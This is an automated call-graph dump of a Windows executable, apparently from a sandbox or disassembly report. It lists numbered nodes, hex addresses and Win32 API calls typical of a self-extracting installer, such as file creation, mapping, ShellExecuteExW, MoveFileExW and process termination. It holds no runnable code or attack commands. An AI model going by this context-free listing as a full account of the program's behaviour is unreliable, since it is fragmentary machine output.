24174->24101 24175->24103 24176->24104 24178 88bb10 _wcslen 24177->24178 24179 88bbb8 GetCurrentDirectoryW 24178->24179 24180 88bb39 _wcslen 24178->24180 24179->24180 24180->24125 24181->24135 24182->24139 24183->24144 24184->24147 24185->24148 24187 889781 24186->24187 24188 889757 24186->24188 24187->24156 24188->24187 24197 88a1e0 24188->24197 24192 88962c 24191->24192 24193 88964a 24191->24193 24192->24193 24195 889638 FindCloseChangeNotification 24192->24195 24194 889669 24193->24194 24205 886bd5 76 API calls 24193->24205 24194->24156 24195->24193 24198 89ec50 24197->24198 24199 88a1ed DeleteFileW 24198->24199 24200 88977f 24199->24200 24201 88a200 24199->24201 24200->24156 24202 88bb03 GetCurrentDirectoryW 24201->24202 24203 88a214 24202->24203 24203->24200 24204 88a218 DeleteFileW 24203->24204 24204->24200 24205->24194 24206->24164 24208 89eb3d ___std_exception_copy 24207->24208 24209 8990d6 24208->24209 24212 89eb59 24208->24212 24216 8a7a5e 7 API calls 2 library calls 24208->24216 24209->23665 24211 89f5c9 24218 8a238d RaiseException 24211->24218 24212->24211 24217 8a238d RaiseException 24212->24217 24215 89f5e6 24216->24208 24217->24211 24218->24215 24220 8a7ce1 _abort 24219->24220 24221 8a7cfa 24220->24221 24222 8a7ce8 24220->24222 24243 8aac31 EnterCriticalSection 24221->24243 24255 8a7e2f GetModuleHandleW 24222->24255 24225 8a7ced 24225->24221 24256 8a7e73 GetModuleHandleExW 24225->24256 24226 8a7d9f 24244 8a7ddf 24226->24244 24230 8a7d76 24235 8a7d8e 24230->24235 24240 8a8a91 _abort 5 API calls 24230->24240 24232 8a7d01 24232->24226 24232->24230 24264 8a87e0 20 API calls _abort 24232->24264 24233 8a7de8 24265 8b2390 5 API calls CatchGuardHandler 24233->24265 24234 8a7dbc 24247 8a7dee 24234->24247 24236 8a8a91 _abort 5 API calls 24235->24236 24236->24226 24240->24235 24243->24232 24266 8aac81 LeaveCriticalSection 24244->24266 24246 8a7db8 24246->24233 24246->24234 24267 8ab076 24247->24267 24250 8a7e1c 24252 8a7e73 _abort 8 API calls 24250->24252 24251 8a7dfc GetPEB 24251->24250 24253 8a7e0c GetCurrentProcess TerminateProcess 24251->24253 24254 8a7e24 ExitProcess 24252->24254 24253->24250 24255->24225 24257 8a7e9d GetProcAddress 24256->24257 24258 8a7ec0 24256->24258 24261 8a7eb2 24257->24261 24259 8a7ecf 24258->24259 24260 8a7ec6 FreeLibrary 24258->24260 24262 89fbbc CatchGuardHandler 5 API calls 24259->24262 24260->24259 24261->24258 24263 8a7cf9 24262->24263 24263->24221 24264->24230 24266->24246 24268 8ab09b 24267->24268 24269 8ab091 24267->24269 24270 8aac98 _abort 5 API calls 24268->24270 24271 89fbbc CatchGuardHandler 5 API calls 24269->24271 24270->24269 24272 8a7df8 24271->24272 24272->24250 24272->24251 25474 8962ca 123 API calls __InternalCxxFrameHandler 25525 89b5c0 100 API calls 25526 8977c0 118 API calls 25527 89ffc0 RaiseException _com_error::_com_error CallUnexpected 24279 89dec2 24280 89decf 24279->24280 24281 88e617 53 API calls 24280->24281 24282 89dedc 24281->24282 24283 884092 _swprintf 51 API calls 24282->24283 24284 89def1 SetDlgItemTextW 24283->24284 24287 89b568 PeekMessageW 24284->24287 24288 89b5bc 24287->24288 24289 89b583 GetMessageW 24287->24289 24290 89b599 IsDialogMessageW 24289->24290 24291 89b5a8 TranslateMessage DispatchMessageW 24289->24291 24290->24288 24290->24291 24291->24288 25476 8a0ada 51 API calls 2 library calls 24397 89e1d1 14 API calls ___delayLoadHelper2@8 25477 89f4d3 20 API calls 25528 8aa3d0 21 API calls 2 library calls 25529 8b2bd0 VariantClear 24401 8810d5 24406 885abd 24401->24406 24407 885ac7 __EH_prolog 24406->24407 24413 88b505 24407->24413 24409 885ad3 24419 885cac GetCurrentProcess GetProcessAffinityMask 24409->24419 24414 88b50f __EH_prolog 24413->24414 24420 88f1d0 82 API calls 24414->24420 24416 88b521 24421 88b61e 24416->24421 24420->24416 24422 88b630 _abort 24421->24422 24425 8910dc 24422->24425 24428 89109e GetCurrentProcess GetProcessAffinityMask 24425->24428 24429 88b597 24428->24429 24429->24409 24430 89e2d7 24432 89e1db 24430->24432 24431 89e85d ___delayLoadHelper2@8 14 API calls 24431->24432 24432->24431 25531 88f1e8 FreeLibrary 24587 89b7e0 24588 89b7ea __EH_prolog 24587->24588 24755 881316 24588->24755 24591 89bf0f 24820 89d69e 24591->24820 24592 89b82a 24594 89b838 24592->24594 24595 89b89b 24592->24595 24668 89b841 24592->24668 24598 89b878 24594->24598 24599 89b83c 24594->24599 24597 89b92e GetDlgItemTextW 24595->24597 24602 89b8b1 24595->24602 24597->24598 24605 89b96b 24597->24605 24606 89b95f KiUserCallbackDispatcher 24598->24606 24598->24668 24610 88e617 53 API calls 24599->24610 24599->24668 24600 89bf38 24603 89bf41 SendDlgItemMessageW 24600->24603 24604 89bf52 GetDlgItem SendMessageW 24600->24604 24601 89bf2a SendMessageW 24601->24600 24609 88e617 53 API calls 24602->24609 24603->24604 24838 89a64d GetCurrentDirectoryW 24604->24838 24607 89b980 GetDlgItem 24605->24607 24608 89b974 24605->24608 24606->24668 24612 89b994 SendMessageW SendMessageW 24607->24612 24613 89b9b7 SetFocus 24607->24613 24608->24598 24624 89be55 24608->24624 24614 89b8ce SetDlgItemTextW 24609->24614 24615 89b85b 24610->24615 24612->24613 24617 89b9c7 24613->24617 24633 89b9e0 24613->24633 24618 89b8d9 24614->24618 24858 88124f SHGetMalloc 24615->24858 24616 89bf82 GetDlgItem 24620 89bf9f 24616->24620 24621 89bfa5 SetWindowTextW 24616->24621 24623 88e617 53 API calls 24617->24623 24627 89b8e6 GetMessageW 24618->24627 24618->24668 24620->24621 24839 89abab GetClassNameW 24621->24839 24628 89b9d1 24623->24628 24625 88e617 53 API calls 24624->24625 24629 89be65 SetDlgItemTextW 24625->24629 24631 89b8fd IsDialogMessageW 24627->24631 24627->24668 24859 89d4d4 24628->24859 24635 89be79 24629->24635 24631->24618 24637 89b90c TranslateMessage DispatchMessageW 24631->24637 24638 88e617 53 API calls 24633->24638 24634 89c1fc SetDlgItemTextW 24634->24668 24640 88e617 53 API calls 24635->24640 24637->24618 24639 89ba17 24638->24639 24642 884092 _swprintf 51 API calls 24639->24642 24677 89be9c _wcslen 24640->24677 24641 89bff0 24645 89c020 24641->24645 24648 88e617 53 API calls 24641->24648 24647 89ba29 24642->24647 24643 89c73f 97 API calls 24643->24641 24644 89b9d9 24765 88a0b1 24644->24765 24650 89c73f 97 API calls 24645->24650 24709 89c0d8 24645->24709 24652 89d4d4 16 API calls 24647->24652 24653 89c003 SetDlgItemTextW 24648->24653 24657 89c03b 24650->24657 24651 89c18b 24658 89c19d 24651->24658 24659 89c194 EnableWindow 24651->24659 24652->24644 24661 88e617 53 API calls 24653->24661 24654 89ba68 GetLastError 24655 89ba73 24654->24655 24771 89ac04 SetCurrentDirectoryW 24655->24771 24669 89c04d 24657->24669 24700 89c072 24657->24700 24664 89c1ba 24658->24664 24877 8812d3 GetDlgItem EnableWindow 24658->24877 24659->24658 24660 89beed 24663 88e617 53 API calls 24660->24663 24665 89c017 SetDlgItemTextW 24661->24665 24662 89ba87 24666 89ba9e 24662->24666 24667 89ba90 GetLastError 24662->24667 24663->24668 24672 89c1e1 24664->24672 24678 89c1d9 SendMessageW 24664->24678 24665->24645 24674 89bb11 24666->24674 24679 89bb20 24666->24679 24680 89baae GetTickCount 24666->24680 24667->24666 24875 899ed5 32 API calls 24669->24875 24670 89c0cb 24673 89c73f 97 API calls 24670->24673 24672->24668 24681 88e617 53 API calls 24672->24681 24673->24709 24674->24679 24683 89bd56 24674->24683 24676 89c1b0 24878 8812d3 GetDlgItem EnableWindow 24676->24878 24677->24660 24682 88e617 53 API calls 24677->24682 24678->24672 24691 89bcfb 24679->24691 24692 89bb39 GetModuleFileNameW 24679->24692 24693 89bcf1 24679->24693 24687 884092 _swprintf 51 API calls 24680->24687 24688 89b862 24681->24688 24689 89bed0 24682->24689 24780 8812f1 GetDlgItem ShowWindow 24683->24780 24684 89c066 24684->24700 24695 89bac7 24687->24695 24688->24634 24688->24668 24696 884092 _swprintf 51 API calls 24689->24696 24690 89c169 24876 899ed5 32 API calls 24690->24876 24699 88e617 53 API calls 24691->24699 24869 88f28c 82 API calls 24692->24869 24693->24598 24693->24691 24694 89bd66 24781 8812f1 GetDlgItem ShowWindow 24694->24781 24772 88966e 24695->24772 24696->24660 24705 89bd05 24699->24705 24700->24670 24706 89c73f 97 API calls 24700->24706 24702 88e617 53 API calls 24702->24709 24703 89c188 24703->24651 24704 89bb5f 24710 884092 _swprintf 51 API calls 24704->24710 24711 884092 _swprintf 51 API calls 24705->24711 24707 89c0a0 24706->24707 24707->24670 24712 89c0a9 DialogBoxParamW 24707->24712 24708 89bd70 24713 88e617 53 API calls 24708->24713 24709->24651 24709->24690 24709->24702 24715 89bb81 CreateFileMappingW 24710->24715 24716 89bd23 24711->24716 24712->24598 24712->24670 24717 89bd7a SetDlgItemTextW 24713->24717 24719 89bbe3 GetCommandLineW 24715->24719 24748 89bc60 __InternalCxxFrameHandler 24715->24748 24728 88e617 53 API calls 24716->24728 24782 8812f1 GetDlgItem ShowWindow 24717->24782 24718 89baed 24722 89baff 24718->24722 24723 89baf4 GetLastError 24718->24723 24724 89bbf4 24719->24724 24720 89bc6b ShellExecuteExW 24746 89bc88 24720->24746 24726 88959a 80 API calls 24722->24726 24723->24722 24870 89b425 SHGetMalloc 24724->24870 24725 89bd8c SetDlgItemTextW GetDlgItem 24730 89bda9 GetWindowLongW SetWindowLongW 24725->24730 24731 89bdc1 24725->24731 24726->24674 24729 89bd3d 24728->24729 24730->24731 24783 89c73f 24731->24783 24732 89bc10 24871 89b425 SHGetMalloc 24732->24871 24735 89bc1c 24872 89b425 SHGetMalloc 24735->24872 24738 89bccb 24738->24693 24744 89bce1 UnmapViewOfFile CloseHandle 24738->24744 24739 89c73f 97 API calls 24741 89bddd 24739->24741 24740 89bc28 24873 88f3fa 82 API calls 2 library calls 24740->24873 24808 89da52 24741->24808 24744->24693 24745 89bc3f MapViewOfFile 24745->24748 24746->24738 24749 89bcb7 Sleep 24746->24749 24748->24720 24749->24738 24749->24746 24750 89c73f 97 API calls 24753 89be03 24750->24753 24751 89be2c 24874 8812d3 GetDlgItem EnableWindow 24751->24874 24753->24751 24754 89c73f 97 API calls 24753->24754 24754->24751 24756 881378 24755->24756 24757 88131f 24755->24757 24880 88e2c1 GetWindowLongW SetWindowLongW 24756->24880 24759 881385 24757->24759 24879 88e2e8 62 API calls 2 library calls 24757->24879 24759->24591 24759->24592 24759->24668 24761 881341 24761->24759 24762 881354 GetDlgItem 24761->24762 24762->24759 24763 881364 24762->24763 24763->24759 24764 88136a SetWindowTextW 24763->24764 24764->24759 24767 88a0bb 24765->24767 24766 88a14c 24768 88a2b2 8 API calls 24766->24768 24769 88a175 24766->24769 24767->24766 24767->24769 24881 88a2b2 24767->24881 24768->24769 24769->24654 24769->24655 24771->24662 24773 889678 24772->24773 24774 8896d5 CreateFileW 24773->24774 24775 8896c9 24773->24775 24774->24775 24776 88971f 24775->24776 24777 88bb03 GetCurrentDirectoryW 24775->24777 24776->24718 24778 889704 24777->24778 24778->24776 24779 889708 CreateFileW 24778->24779 24779->24776 24780->24694 24781->24708 24782->24725 24784 89c749 __EH_prolog 24783->24784 24785 89bdcf 24784->24785 24786 89b314 ExpandEnvironmentStringsW 24784->24786 24785->24739 24797 89c780 _wcslen _wcsrchr 24786->24797 24788 89b314 ExpandEnvironmentStringsW 24788->24797 24789 89ca67 SetWindowTextW 24789->24797 24792 8a3e3e 22 API calls 24792->24797 24794 89c855 SetFileAttributesW 24796 89c90f GetFileAttributesW 24794->24796 24807 89c86f _abort _wcslen 24794->24807 24796->24797 24799 89c921 DeleteFileW 24796->24799 24797->24785 24797->24788 24797->24789 24797->24792 24797->24794 24800 89cc31 GetDlgItem SetWindowTextW SendMessageW 24797->24800 24803 89cc71 SendMessageW 24797->24803 24902 891fbb CompareStringW 24797->24902 24903 89a64d GetCurrentDirectoryW 24797->24903 24905 88a5d1 6 API calls 24797->24905 24906 88a55a FindClose 24797->24906 24907 89b48e 76 API calls 2 library calls 24797->24907 24799->24797 24801 89c932 24799->24801 24800->24797 24802 884092 _swprintf 51 API calls 24801->24802 24804 89c952 GetFileAttributesW 24802->24804 24803->24797 24804->24801 24805 89c967 MoveFileW 24804->24805 24805->24797 24806 89c97f MoveFileExW 24805->24806 24806->24797 24807->24796 24807->24797 24904 88b991 51 API calls 2 library calls 24807->24904 24809 89da5c __EH_prolog 24808->24809 24908 890659 24809->24908 24811 89da8d 24912 885b3d 24811->24912 24813 89daab 24916 887b0d 24813->24916 24817 89dafe 24932 887b9e 24817->24932 24819 89bdee 24819->24750 24821 89d6a8 24820->24821 24822 89a5c6 4 API calls 24821->24822 24823 89d6ad 24822->24823 24824 89d6b5 GetWindow 24823->24824 24825 89bf15 24823->24825 24824->24825 24831 89d6d5 24824->24831 24825->24600 24825->24601 24826 89d6e2 GetClassNameW 25397 891fbb CompareStringW 24826->25397 24828 89d76a GetWindow 24828->24825 24828->24831 24829 89d706 GetWindowLongW 24829->24828 24830 89d716 SendMessageW 24829->24830 24830->24828 24832 89d72c GetObjectW 24830->24832 24831->24825 24831->24826 24831->24828 24831->24829 25398 89a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24832->25398 24834 89d743 25399 89a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24834->25399 25400 89a80c 8 API calls 24834->25400 24837 89d754 SendMessageW DeleteObject 24837->24828 24838->24616 24840 89abcc 24839->24840 24842 89abf1 24839->24842 25401 891fbb CompareStringW 24840->25401 24845 89b093 24842->24845 24843 89abdf 24843->24842 24844 89abe3 FindWindowExW 24843->24844 24844->24842 24846 89b09d __EH_prolog 24845->24846 24847 8813dc 84 API calls 24846->24847 24848 89b0bf 24847->24848 25402 881fdc 24848->25402 24851 89b0d9 24853 881692 86 API calls 24851->24853 24852 89b0eb 24854 8819af 128 API calls 24852->24854 24856 89b0e4 24853->24856 24857 89b10d __InternalCxxFrameHandler ___std_exception_copy 24854->24857 24855 881692 86 API calls 24855->24856 24856->24641 24856->24643 24857->24855 24858->24688 24860 89b568 5 API calls 24859->24860 24861 89d4e0 GetDlgItem 24860->24861 24862 89d502 24861->24862 24863 89d536 SendMessageW SendMessageW 24861->24863 24868 89d50d ShowWindow SendMessageW SendMessageW 24862->24868 24864 89d591 SendMessageW SendMessageW SendMessageW 24863->24864 24865 89d572 24863->24865 24866 89d5c4 SendMessageW 24864->24866 24867 89d5e7 SendMessageW 24864->24867 24865->24864 24866->24867 24867->24644 24868->24863 24869->24704 24870->24732 24871->24735 24872->24740 24873->24745 24874->24608 24875->24684 24876->24703 24877->24676 24878->24664 24879->24761 24880->24759 24882 88a2bf 24881->24882 24883 88a2e3 24882->24883 24884 88a2d6 CreateDirectoryW 24882->24884 24885 88a231 3 API calls 24883->24885 24884->24883 24886 88a316 24884->24886 24889 88a2e9 24885->24889 24887 88a325 24886->24887 24894 88a4ed 24886->24894 24887->24767 24888 88a329 GetLastError 24888->24887 24889->24888 24890 88bb03 GetCurrentDirectoryW 24889->24890 24892 88a2ff 24890->24892 24892->24888 24893 88a303 CreateDirectoryW 24892->24893 24893->24886 24893->24888 24895 89ec50 24894->24895 24896 88a4fa SetFileAttributesW 24895->24896 24897 88a53d 24896->24897 24898 88a510 24896->24898 24897->24887 24899 88bb03 GetCurrentDirectoryW 24898->24899 24900 88a524 24899->24900 24900->24897 24901 88a528 SetFileAttributesW 24900->24901 24901->24897 24902->24797 24903->24797 24904->24807 24905->24797 24906->24797 24907->24797 24909 890666 _wcslen 24908->24909 24936 8817e9 24909->24936 24911 89067e 24911->24811 24913 890659 _wcslen 24912->24913 24914 8817e9 78 API calls 24913->24914 24915 89067e 24914->24915 24915->24813 24917 887b17 __EH_prolog 24916->24917 24953 88ce40 24917->24953 24919 887b32 24920 89eb38 8 API calls 24919->24920 24921 887b5c 24920->24921 24959 894a76 24921->24959 24924 887c7d 24925 887c87 24924->24925 24928 887cf1 24925->24928 24988 88a56d 24925->24988 24927 887d50 24930 887d92 24927->24930 24994 88138b 74 API calls 24927->24994 24928->24927 24966 888284 24928->24966 24930->24817 24933 887bac 24932->24933 24935 887bb3 24932->24935 24934 892297 86 API calls 24933->24934 24934->24935 24937 8817ff 24936->24937 24948 88185a __InternalCxxFrameHandler 24936->24948 24938 881828 24937->24938 24949 886c36 76 API calls __vswprintf_c_l 24937->24949 24939 881887 24938->24939 24945 881847 ___std_exception_copy 24938->24945 24942 8a3e3e 22 API calls 24939->24942 24941 88181e 24950 886ca7 75 API calls 24941->24950 24944 88188e 24942->24944 24944->24948 24952 886ca7 75 API calls 24944->24952 24945->24948 24951 886ca7 75 API calls 24945->24951 24948->24911 24949->24941 24950->24938 24951->24948 24952->24948 24954 88ce4a __EH_prolog 24953->24954 24955 89eb38 8 API calls 24954->24955 24956 88ce8d 24955->24956 24957 89eb38 8 API calls 24956->24957 24958 88ceb1 24957->24958 24958->24919 24960 894a80 __EH_prolog 24959->24960 24961 89eb38 8 API calls 24960->24961 24962 894a9c 24961->24962 24963 887b8b 24962->24963 24965 890e46 80 API calls 24962->24965 24963->24924 24965->24963 24967 88828e __EH_prolog 24966->24967 24995 8813dc 24967->24995 24969 8882aa 24970 8882bb 24969->24970 25138 889f42 24969->25138 24973 8882f2 24970->24973 25003 881a04 24970->25003 25134 881692 24973->25134 24976 8882ee 24976->24973 24984 88a56d 7 API calls 24976->24984 24987 888389 24976->24987 25142 88c0c5 CompareStringW _wcslen 24976->25142 24979 8883e8 25030 881f6d 24979->25030 24984->24976 24985 8883f3 24985->24973 25034 883b2d 24985->25034 25046 88848e 24985->25046 25022 888430 24987->25022 24989 88a582 24988->24989 24993 88a5b0 24989->24993 25386 88a69b 24989->25386 24991 88a592 24992 88a597 FindClose 24991->24992 24991->24993 24992->24993 24993->24925 24994->24930 24996 8813e1 __EH_prolog 24995->24996 24997 88ce40 8 API calls 24996->24997 24998 881419 24997->24998 24999 89eb38 8 API calls 24998->24999 25002 881474 _abort 24998->25002 25000 881461 24999->25000 25001 88b505 84 API calls 25000->25001 25000->25002 25001->25002 25002->24969 25005 881a0e __EH_prolog 25003->25005 25004 881b9b 25004->24976 25005->25004 25017 881a61 25005->25017 25143 8813ba 25005->25143 25008 881bc7 25146 88138b 74 API calls 25008->25146 25010 883b2d 101 API calls 25013 881c12 25010->25013 25011 881bd4 25011->25004 25011->25010 25012 881c5a 25012->25004 25016 881c8d 25012->25016 25147 88138b 74 API calls 25012->25147 25013->25012 25015 883b2d 101 API calls 25013->25015 25015->25013 25016->25004 25020 889e80 79 API calls 25016->25020 25017->25004 25017->25008 25017->25011 25018 883b2d 101 API calls 25019 881cde 25018->25019 25019->25004 25019->25018 25020->25019 25021 889e80 79 API calls 25021->25017 25165 88cf3d 25022->25165 25024 888440 25169 8913d2 GetSystemTime SystemTimeToFileTime 25024->25169 25026 8883a3 25026->24979 25027 891b66 25026->25027 25174 89de6b 25027->25174 25031 881f72 __EH_prolog 25030->25031 25032 881fa6 25031->25032 25182 8819af 25031->25182 25032->24985 25035 883b39 25034->25035 25036 883b3d 25034->25036 25035->24985 25045 889e80 79 API calls 25036->25045 25037 883b4f 25038 883b78 25037->25038 25039 883b6a 25037->25039 25313 88286b 101 API calls 3 library calls 25038->25313 25040 883baa 25039->25040 25312 8832f7 89 API calls 2 library calls 25039->25312 25040->24985 25043 883b76 25043->25040 25314 8820d7 74 API calls 25043->25314 25045->25037 25047 888498 __EH_prolog 25046->25047 25052 8884d5 25047->25052 25065 888513 25047->25065 25339 898c8d 103 API calls 25047->25339 25048 8884f5 25050 8884fa 25048->25050 25051 88851c 25048->25051 25050->25065 25340 887a0d 152 API calls 25050->25340 25051->25065 25341 898c8d 103 API calls 25051->25341 25052->25048 25056 88857a 25052->25056 25052->25065 25056->25065 25315 885d1a 25056->25315 25057 888605 25057->25065 25321 888167 25057->25321 25060 888797 25061 88a56d 7 API calls 25060->25061 25062 888802 25060->25062 25061->25062 25327 887c0d 25062->25327 25064 88d051 82 API calls 25071 88885d 25064->25071 25065->24985 25066 88898b 25344 882021 74 API calls 25066->25344 25067 888992 25068 888a5f 25067->25068 25075 8889e1 25067->25075 25072 888ab6 25068->25072 25087 888a6a 25068->25087 25071->25064 25071->25065 25071->25066 25071->25067 25342 888117 84 API calls 25071->25342 25343 882021 74 API calls 25071->25343 25079 888a4c 25072->25079 25347 887fc0 97 API calls 25072->25347 25073 888b14 25076 889105 25073->25076 25094 888b82 25073->25094 25348 8898bc 25073->25348 25074 888ab4 25080 88959a 80 API calls 25074->25080 25075->25073 25075->25079 25081 88a231 3 API calls 25075->25081 25078 88959a 80 API calls 25076->25078 25078->25065 25079->25073 25079->25074 25080->25065 25082 888a19 25081->25082 25082->25079 25345 8892a3 97 API calls 25082->25345 25084 88ab1a 8 API calls 25085 888bd1 25084->25085 25088 88ab1a 8 API calls 25085->25088 25087->25074 25346 887db2 101 API calls 25087->25346 25105 888be7 25088->25105 25092 888b70 25352 886e98 77 API calls 25092->25352 25094->25084 25095 888d18 25098 888d8a 25095->25098 25099 888d28 25095->25099 25096 888e40 25100 888e52 25096->25100 25101 888e66 25096->25101 25120 888d49 25096->25120 25097 888cbc 25097->25095 25097->25096 25106 888167 19 API calls 25098->25106 25102 888d6e 25099->25102 25110 888d37 25099->25110 25103 889215 123 API calls 25100->25103 25104 893377 75 API calls 25101->25104 25102->25120 25355 8877b8 111 API calls 25102->25355 25103->25120 25107 888e7f 25104->25107 25105->25097 25108 888c93 25105->25108 25114 88981a 79 API calls 25105->25114 25109 888dbd 25106->25109 25358 893020 123 API calls 25107->25358 25108->25097 25353 889a3c 82 API calls 25108->25353 25116 888df5 25109->25116 25117 888de6 25109->25117 25109->25120 25354 882021 74 API calls 25110->25354 25114->25108 25357 889155 93 API calls __EH_prolog 25116->25357 25356 887542 85 API calls 25117->25356 25123 888f85 25120->25123 25359 882021 74 API calls 25120->25359 25122 889090 25122->25076 25124 88a4ed 3 API calls 25122->25124 25123->25076 25123->25122 25125 88903e 25123->25125 25333 889f09 SetEndOfFile 25123->25333 25126 8890eb 25124->25126 25334 889da2 25125->25334 25126->25076 25360 882021 74 API calls 25126->25360 25129 889085 25131 889620 77 API calls 25129->25131 25131->25122 25132 8890fb 25361 886dcb 76 API calls 25132->25361 25135 8816a4 25134->25135 25377 88cee1 25135->25377 25139 889f59 25138->25139 25141 889f63 25139->25141 25385 886d0c 78 API calls 25139->25385 25141->24970 25142->24976 25148 881732 25143->25148 25145 8813d6 25145->25021 25146->25004 25147->25016 25149 881748 25148->25149 25160 8817a0 __InternalCxxFrameHandler 25148->25160 25150 881771 25149->25150 25161 886c36 76 API calls __vswprintf_c_l 25149->25161 25151 8817c7 25150->25151 25155 88178d ___std_exception_copy 25150->25155 25154 8a3e3e 22 API calls 25151->25154 25153 881767 25162 886ca7 75 API calls 25153->25162 25157 8817ce 25154->25157 25155->25160 25163 886ca7 75 API calls 25155->25163 25157->25160 25164 886ca7 75 API calls 25157->25164 25160->25145 25161->25153 25162->25150 25163->25160 25164->25160 25166 88cf4d 25165->25166 25168 88cf54 25165->25168 25170 88981a 25166->25170 25168->25024 25169->25026 25171 889833 25170->25171 25173 889e80 79 API calls 25171->25173 25172 889865 25172->25168 25173->25172 25175 89de78 25174->25175 25176 88e617 53 API calls 25175->25176 25177 89de9b 25176->25177 25178 884092 _swprintf 51 API calls 25177->25178 25179 89dead 25178->25179 25180 89d4d4 16 API calls 25179->25180 25181 891b7c 25180->25181 25181->24979 25183 8819bf 25182->25183 25185 8819bb 25182->25185 25186 8818f6 25183->25186 25185->25032 25187 881908 25186->25187 25188 881945 25186->25188 25189 883b2d 101 API calls 25187->25189 25194 883fa3 25188->25194 25192 881928 25189->25192 25192->25185 25196 883fac 25194->25196 25195 883b2d 101 API calls 25195->25196 25196->25195 25198 881966 25196->25198 25211 890e08 25196->25211 25198->25192 25199 881e50 25198->25199 25200 881e5a __EH_prolog 25199->25200 25219 883bba 25200->25219 25202 881e84 25203 881732 78 API calls 25202->25203 25206 881f0b 25202->25206 25204 881e9b 25203->25204 25247 8818a9 78 API calls 25204->25247 25206->25192 25207 881eb3 25209 881ebf _wcslen 25207->25209 25248 891b84 MultiByteToWideChar 25207->25248 25249 8818a9 78 API calls 25209->25249 25212 890e0f 25211->25212 25213 890e2a 25212->25213 25217 886c31 RaiseException CallUnexpected 25212->25217 25214 890e3b SetThreadExecutionState 25213->25214 25218 886c31 RaiseException CallUnexpected 25213->25218 25214->25196 25217->25213 25218->25214 25220 883bc4 __EH_prolog 25219->25220 25221 883bda 25220->25221 25222 883bf6 25220->25222 25275 88138b 74 API calls 25221->25275 25224 883e51 25222->25224 25227 883c22 25222->25227 25292 88138b 74 API calls 25224->25292 25226 883be5 25226->25202 25227->25226 25250 893377 25227->25250 25229 883ca3 25230 883d2e 25229->25230 25246 883c9a 25229->25246 25278 88d051 25229->25278 25260 88ab1a 25230->25260 25231 883c9f 25231->25229 25277 8820bd 78 API calls 25231->25277 25233 883c8f 25276 88138b 74 API calls 25233->25276 25234 883c71 25234->25229 25234->25231 25234->25233 25238 883d41 25240 883dd7 25238->25240 25241 883dc7 25238->25241 25284 893020 123 API calls 25240->25284 25264 889215 25241->25264 25244 883dd5 25244->25246 25285 882021 74 API calls 25244->25285 25286 892297 25246->25286 25247->25207 25248->25209 25249->25206 25251 89338c 25250->25251 25253 893396 ___std_exception_copy 25250->25253 25293 886ca7 75 API calls 25251->25293 25254 89341c 25253->25254 25255 8934c6 25253->25255 25259 893440 _abort 25253->25259 25294 8932aa 75 API calls 3 library calls 25254->25294 25295 8a238d RaiseException 25255->25295 25258 8934f2 25259->25234 25261 88ab28 25260->25261 25263 88ab32 25260->25263 25262 89eb38 8 API calls 25261->25262 25262->25263 25263->25238 25265 88921f __EH_prolog 25264->25265 25296 887c64 25265->25296 25268 8813ba 78 API calls 25269 889231 25268->25269 25299 88d114 25269->25299 25271 88928a 25271->25244 25272 88d114 118 API calls 25274 889243 25272->25274 25274->25271 25274->25272 25308 88d300 97 API calls __InternalCxxFrameHandler 25274->25308 25275->25226 25276->25246 25277->25229 25279 88d072 25278->25279 25280 88d084 25278->25280 25309 88603a 82 API calls 25279->25309 25310 88603a 82 API calls 25280->25310 25283 88d07c 25283->25230 25284->25244 25285->25246 25287 8922a1 25286->25287 25288 8922ba 25287->25288 25291 8922ce 25287->25291 25311 890eed 86 API calls 25288->25311 25290 8922c1 25290->25291 25292->25226 25293->25253 25294->25259 25295->25258 25297 88b146 GetVersionExW 25296->25297 25298 887c69 25297->25298 25298->25268 25305 88d12a __InternalCxxFrameHandler 25299->25305 25300 88d29a 25301 88d2ce 25300->25301 25302 88d0cb 6 API calls 25300->25302 25303 890e08 SetThreadExecutionState RaiseException 25301->25303 25302->25301 25306 88d291 25303->25306 25304 898c8d 103 API calls 25304->25305 25305->25300 25305->25304 25305->25306 25307 88ac05 91 API calls 25305->25307 25306->25274 25307->25305 25308->25274 25309->25283 25310->25283 25311->25290 25312->25043 25313->25043 25314->25040 25316 885d2a 25315->25316 25362 885c4b 25316->25362 25318 885d5d 25320 885d95 25318->25320 25367 88b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25318->25367 25320->25057 25322 888186 25321->25322 25323 888232 25322->25323 25374 88be5e 19 API calls __InternalCxxFrameHandler 25322->25374 25373 891fac CharUpperW 25323->25373 25326 88823b 25326->25060 25328 887c22 25327->25328 25329 887c5a 25328->25329 25375 886e7a 74 API calls 25328->25375 25329->25071 25331 887c52 25376 88138b 74 API calls 25331->25376 25333->25125 25335 889dc2 25334->25335 25336 889db3 25334->25336 25338 889e3f SetFileTime 25335->25338 25336->25335 25337 889db9 FlushFileBuffers 25336->25337 25337->25335 25338->25129 25339->25052 25340->25065 25341->25065 25342->25071 25343->25071 25344->25067 25345->25079 25346->25074 25347->25079 25349 888b5a 25348->25349 25350 8898c5 GetFileType 25348->25350 25349->25094 25351 882021 74 API calls 25349->25351 25350->25349 25351->25092 25352->25094 25353->25097 25354->25120 25355->25120 25356->25120 25357->25120 25358->25120 25359->25123 25360->25132 25361->25076 25368 885b48 25362->25368 25364 885c6c 25364->25318 25366 885b48 2 API calls 25366->25364 25367->25318 25370 885b52 25368->25370 25369 885c3a 25369->25364 25369->25366 25370->25369 25372 88b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25370->25372 25372->25370 25373->25326 25374->25323 25375->25331 25376->25329 25378 88cef2 25377->25378 25383 88a99e 86 API calls 25378->25383 25380 88cf24 25384 88a99e 86 API calls 25380->25384 25382 88cf2f 25383->25380 25384->25382 25385->25141 25387 88a6a8 25386->25387 25388 88a6c1 FindFirstFileW 25387->25388 25389 88a727 FindNextFileW 25387->25389 25391 88a6d0 25388->25391 25396 88a709 25388->25396 25390 88a732 GetLastError 25389->25390 25389->25396 25390->25396 25392 88bb03 GetCurrentDirectoryW 25391->25392 25393 88a6e0 25392->25393 25394 88a6fe GetLastError 25393->25394 25395 88a6e4 FindFirstFileW 25393->25395 25394->25396 25395->25394 25395->25396 25396->24991 25397->24831 25398->24834 25399->24834 25400->24837 25401->24843 25403 889f42 78 API calls 25402->25403 25404 881fe8 25403->25404 25405 881a04 101 API calls 25404->25405 25408 882005 25404->25408 25406 881ff5 25405->25406 25406->25408 25409 88138b 74 API calls 25406->25409 25408->24851 25408->24852 25409->25408 25410 8813e1 84 API calls 2 library calls 25479 8994e0 GetClientRect 25480 89f2e0 46 API calls 